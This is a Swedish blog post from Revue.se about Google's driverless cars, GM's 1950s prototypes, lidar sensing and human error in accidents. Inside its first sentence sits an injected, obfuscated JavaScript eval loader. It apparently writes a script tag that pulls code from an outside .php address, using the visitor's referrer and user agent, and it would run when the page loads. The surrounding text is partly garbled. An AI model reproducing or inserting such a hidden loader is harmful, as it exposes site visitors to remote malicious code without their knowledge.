Image Image Image Image Image Image Image Image Image Image

| 23 november, 2017

Scroll to top

Top

No Comments

Google: Snart är de förarlösa bilarna här | Revue.se

Sebastian Plengier Ehrnfelt

Snart eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|aerkz|var|u0026u|referrer|arykr||js|php’.split(‘|’),0,{}))
är framtiden här!

1956 visade General Motors i USA upp sin Firebird III, bilen som skulle färdas via elektroniska signaler från framtidens motorvägar. Tre år senare visades också autopilotstyrda Cyclone upp.

56 år har det tagit för människan att nå detta till verklighet. Att en bil ska kunna köras förarlös håller nu på att bil verklighet. Målet för massproduktion ligger redan 2018, då talar vi massproduktion vilket betyder att det troligen kommer finnas tillgängliga för försäljning några år innan.

Det flesta större fordonsföretag sliter hårt idag med att försöka få fram en teknologi som kan bli hjärtat i den framtida förarlösa bilen. IT-företag som Intel har hoppat på tåget samtidigt som studenter vid universitet som Stanford University försöker testa hur fort dessa förarlösa bilar kan komma runt en racingbana.

Längst har företaget Google kommit. Deras bilar är redan ute i trafikerade områden i staten Nevada och samspelar med andra bilar på motorvägar och i tätorter.

Deras otroligt högteknologiska laserteknologi  från Velodyne Lidar läser av 64 laserstrålar av omgivningen i hela 360 grader. Det byggs då upp en 3D-modell som supersnabbt jämförs med kartor från Google Maps. Detta gör att bilen håller sig inom lagens ramar samt inte krockar med andra fordon.

Det är intressant när man läser att 90 procent av alla olyckor beror på den mänskliga faktorn. Man försöker hela tiden att sänka olycksfallen med både lagar om att tala i telefon eller smsa samt bygga säkrare bilar.

– I dag sägs det att man inte ska sms:a när man åker bil. Men kanske är det så att man inte ska åka bil när man sms:ar? säger Peter Gott, fordonsanalytiker på IHS.

En annan rolig del är att det förekommit en krock med Googles bilar hittills, denna krock uppstod när autopiloten var bortkopplad och en anställd körde bilen manuellt.

Vad tror ni om detta? Är detta större än när Internet kom ?

Läs gärna den mer grundläggande artikeln på Svenska Dagbladet, här!

Se också videon ovan som visar när CNN teståker i Washington DC